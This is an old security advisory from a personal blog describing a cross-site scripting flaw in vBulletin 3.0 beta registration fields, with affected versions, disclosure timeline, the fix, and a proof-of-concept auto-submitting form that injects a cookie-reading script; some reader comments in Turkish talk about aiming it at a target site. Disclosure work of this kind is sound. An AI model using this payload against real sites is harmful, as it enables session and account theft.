Menüyü GizleVBulletin New Member XSS Vulnerability
------------------------------------------------------
VBulletin New Member XSS Vulnerability
------------------------------------------------------
Any kind of XSS attacks possibility. With this vuln. an attacker could access other users/admins accounts.
Online URL : http://ferruh.mavituna.com/article.asp?256
------------------------------------------------------
About VBulletin;
------------------------------------------------------
PHP Based Popular Forum Application
Vendor & Demo;
www.vbulletin.com
------------------------------------------------------
Description;
------------------------------------------------------
In new member page (register.php), If you skip a required field system redirect you same form and fill fields automaticly that you enter before for a better form. In standard fields Vbulletin successfully handle script injections. But in optional fields like "Interests-Hobbies", "Biography", "Occupation" etc...
So you can execute any JS with these fields.
------------------------------------------------------
Vulnerable;
------------------------------------------------------
vBulletin 3.0 Beta 2 <> Beta 7
------------------------------------------------------
Non Vulnerable;
------------------------------------------------------
vBulletin 3.0 Gamma
vBulletin 2.3.0
vBulletin 2.2.8 ...
------------------------------------------------------
Vendor Status and Patch;
------------------------------------------------------
26.01.2004, Problem fixed.
To update vB3 Gamma or later.
------------------------------------------------------
History
------------------------------------------------------
Discovered : 15.07.2003
Vendor Informed : 29.07.2003
Publihed : 06.08.2003
------------------------------------------------------
Solution;
------------------------------------------------------
HTML Encoding like other inputs is OK.
------------------------------------------------------
Exploit Code;
------------------------------------------------------
[form action="http://[victim]/register.php?do=register" method="post" style="display:none"]
[input type="hidden" name="s" value="" /]
[input type="hidden" name="regtype" value="1" /]
[input type="text" class="bginput" name="field1" value="" size="25" maxlength="250" /]
[input type="hidden" name="url" value="index.php" /]
[input type="hidden" name="do" value="addmember" /]
[/form]
[script]
//Code that will be executed
var xss = "\"][script]alert(document"+".cookie)[\/script]";
document.forms[0].field1.value=xss;
document.forms[0].submit();
[/script]
*Replace ([],<>)
Ferruh Mavituna
http://ferruh.mavituna.com
Web Application Security Specialist
Yorumunu Ekle -
Yazıcı Versiyonu -
Yorumlar için RSS
ErKan Cengiz - 14.07.2004
hea simdi anLadim bunu galiba boyle bu kodu metin editorunde duzenLiycez
[form action="http://[victim]/register.php?do=register" method="post" style="display:none"]
victim yazan yere hedef site yazilacak
ye metin belgemiz web sayfasi olarak kaydedilecek galiba daha sonrada acilinca sitede acik varsa girilecek gibi birsey fakat tam emin deilim bi ara denerim... sen eli opulecek adamsin ferruh
sende cevherler var bunLari bizede ogret
ErKan Cengiz - 14.07.2004
gene bisi anLamadim falla
- 06.02.2004
th.x alot man for anfo
:) - 19.12.2003
yaaa sunlari turkce yaz abi ya.
Yorum Yazın
Tüm yorumlar onaydan geçmektedir, bu işlem en uzun 30 dk. sürecektir. E-mail adresleri yeni yorumları bildirme harici hiç bir başka amaçla kullanılmamaktadır ve sitede gözükmemektedir.
